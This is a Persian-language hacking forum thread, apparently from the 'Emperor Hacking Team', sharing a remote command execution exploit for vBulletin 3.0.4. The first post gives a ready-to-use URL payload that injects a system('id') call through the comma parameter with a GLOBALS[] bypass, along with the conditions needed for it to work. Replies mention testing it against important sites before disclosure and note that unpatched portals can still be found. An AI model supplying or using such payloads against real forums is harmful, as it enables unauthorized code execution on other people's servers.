نمایش نتایج: از شماره 1 تا 3 , از مجموع 3
  1. #1
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts

    vBulletin v3.0.4 remote command execution exploit

    کد PHP:
     Exploit:
    ----------------
    http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

    Conditions:
    ----------------
    1st condition     $vboptions['showforumusers'] == True the admin must set
                showforumusers ON in vbulletin options
    .

    2nd condition     $bbuserinfo['userid'] == you must be an visitor/guest.

    3rd condition     $DB_site->fetch_array($forumusers) == True when you
                visit the forums
    it  must has at least one user show the forum.

    4th condition     magic_quotes_gpc must be OFF

    SPECIAL condition 
    you must bypass unset($GLOBALS["$_arrykey"]) code in
                init
    .php by secret array GLOBALS[]=;))) 
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


  2. #2
    Soot Guest
    البته 15 فوريه اين پابليك شد حدوده 25 روز پيش اين را داشتم رو سايت هاي مهم تست زدم نميدونم از كجا اين را فيكس كرده بودن
    به هرحال رو شبگرد كه كار نميكنه آخه شبگرد vBulletin Version 3.0.4 و اين اكسپلويت هم واسه 0.5 , 0.7 فککنم باشه .

  3. #3
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts
    همیشه سایت هایی مثل سکیوریتی فوکوس وقتی یک باگ رو پابلیک میکنن که نویسنده اون برنامه یا پورتال باگ رو فیکس کرده باشه
    و وقتی سایت مربوطه باگ رو فیکس و اعلام کرد سایت ها میتونن باگ رو منتشر کنن و تازه براش اکسپلویت نوشته میشه

    البته اگر بگردی بازم پورتال های فیکس نشده میتونی پیدا کنی
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


 

 

موضوعات مشابه

  1. XHP CMS <= 0.5 (upload) Remote Command Execution Exploit
    توسط Ali_Error404 در انجمن بخش هک و سکیوریتی
    پاسخ ها: 0
    آخرين نوشته: 03-25-2006, 01:48 AM
  2. FtpLocate 2.02 Remote Command Execution Exploit
    توسط Ali_Error404 در انجمن بخش هک و سکیوریتی
    پاسخ ها: 2
    آخرين نوشته: 07-27-2005, 12:02 AM
  3. Webhints 1.03 Remote Command Execution Exploit
    توسط iM4n در انجمن بخش هک و سکیوریتی
    پاسخ ها: 2
    آخرين نوشته: 06-11-2005, 09:17 PM
  4. WebAPP v0.9.9.2.1 Remote Command Execution Exploit
    توسط iM4n در انجمن بخش هک و سکیوریتی
    پاسخ ها: 8
    آخرين نوشته: 05-22-2005, 01:06 PM
  5. Fusion SBX <= 1.2 Remote Command Execution Exploit
    توسط iM4n در انجمن بخش هک و سکیوریتی
    پاسخ ها: 0
    آخرين نوشته: 05-21-2005, 08:14 PM

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •